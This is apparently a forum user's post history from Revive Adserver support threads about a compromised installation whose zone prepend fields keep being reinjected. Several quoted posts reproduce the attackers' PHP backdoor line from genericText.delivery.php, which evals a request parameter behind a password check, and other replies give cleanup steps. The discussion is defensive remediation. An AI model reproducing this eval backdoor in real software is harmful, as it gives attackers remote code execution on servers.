TYWebmaster
-
Posts
10 -
Joined
-
Last visited
Posts posted by TYWebmaster
-
-
This time last year I was able to add this code into Generic HTML Banner <script type="text/javascript" src="https://voken.eyereturn.com/j4/js?7935671"></script>
Once I set the size it would pull in the banner info into Revive and be able to server the banners and allow the 3rd party tracking. What has changed in the last updates? Can anyone shed some light on this please?
-
1 minute ago, andrewatfornax said:
Either that or at the O/S level - but if you are on a hosting service that only offers Plesk access, you may not be able to tell. It would be worth asking your hosting provider to check for unexpected accounts or activity at the O/S level, though, just to be sure.
I will do that, is there anything else you can suggest? Any other ways to possibly block them from injecting the code in the prepend?
-
5 minutes ago, andrewatfornax said:
Hi @TYWebmaster,
Thanks for this information - can you please confirm if in addition to changing the database user password and Revive Adserver admin login password:
- Did you change all other DB user account passwords that may exist? Are there any DB user accounts present that you don't recognise?
- Did you change all other Revive Adserver login passwords that may exist? Are there any logins that you don't recognise?
- Did you change all other O/S level account passwords that may exist? Are there any O/S level accounts present that you don't recognise?
Thanks,
Andrew
There is only one DB user account to log into, there is only one Revive login account all others are deleted. I am using Plesk to manage multiple sites so are you referring to another possible PW to log into PHPmyAdmin?
-
9 hours ago, Matteo Beccati said:
Research is still ongoing: we are in touch with a few affected users, but until now we haven't received enough evidence to understand how the malicious plugin or the php files in the images folder are being planted.
I know this may sounds crazy but I think how ever they have hacked in, they now have access to the DB or there is something in the DB thats giving them access, I have removed the line from genericText.delivery.php, turned off the ability to use PHP in the image folder, removed any PHP files from the image folder, went into the database and varchar(0) the prepend/append in the zones and banners, change password for the DB and the Site Admin and 12 hrs later the attack is back, the varchar is changed back to text in the prepend and 3 of my zones have code added back.
I really need to know how to at least lock them out from adding that code. So far all the recommendations have been done and its still coming back.
I would be willing to let you team take a look at our ads server and DB at anytime if it will help this get resolved.
-
4 minutes ago, tvvpmi said:
Which kind of errors? A message saying "File permission errors detected."?
Yes that may affect the delivery.
-
4 hours ago, tvvpmi said:
If prepend/append zones are varchar(0), they can't insert code there for sure. Check if the code is inserted in prepend/append fields of the banners table. As I post before, if the injection is done using the same strategy, you can stop it making the file "plugins/bannerTypeText/oxText/genericText.delivery.php" read only. Another good measure is to disable PHP execution on delivery images folder.
If I make the file "plugins/bannerTypeText/oxText/genericText.delivery.php" read only then I get errors when I log in.
-
On 1/18/2019 at 10:37 AM, franciscomesa said:
Same problem at one installation with ReviveAds 4.1.4.
First time the "hacker" only change one zone. I remove the prepend code and also disabled check box. But it returns.
The second time it change the same.
The third time it change all zones. I update the database to varchar(0) and now it's fine. The file "genericText.delivery.php" have the line "if(isset($_REQUEST['oxText'])&&$_REQUEST['oxText']=='b0087003d2f3006f6623adf6c520462b'){@eval($_REQUEST['zoneId']);}". Removed.
Tried to check logs but cannt find how/where/when it's changing the set.Has any of this been resolved? How are they getting back into the DB and making changes. I had varchar(0) on append/prepend on all zones and today its been changed back and the code is back in the Zones.
-
On 1/9/2019 at 5:07 AM, tvvpmi said:
Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php
Problably it has been modified, adding a line like this at the end:
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
You have to remove it.
Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM
Clean the prepend code of your zones ... via sql o through the revive backend. Search for iframes and javascript codes.
Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them
I have tried all this and some how they are still getting on my system altering the Append/Prepend even after I have turned it off in the DB, please help!!
-
I have the same issue. For some reason my "Direct Selection" is no longer shown since my last upgrade. I have confirmed that the plug-ins are enabled and check approrpiately. I still need to upgrade to version 3.1.0, will this fix my problem is it something else that nots set correctly?
Generic HTML Banner no longer work.. need help
in Using Revive Adserver
Posted
I found the issue. When I access the ads server with Mozilla, it now blocks any kind of scripts or tracking scripts such as the code above. If use chrome or turn off the Mozilla feature and it all works fine. Sorry to bother you and thank you for listening. Just an FYI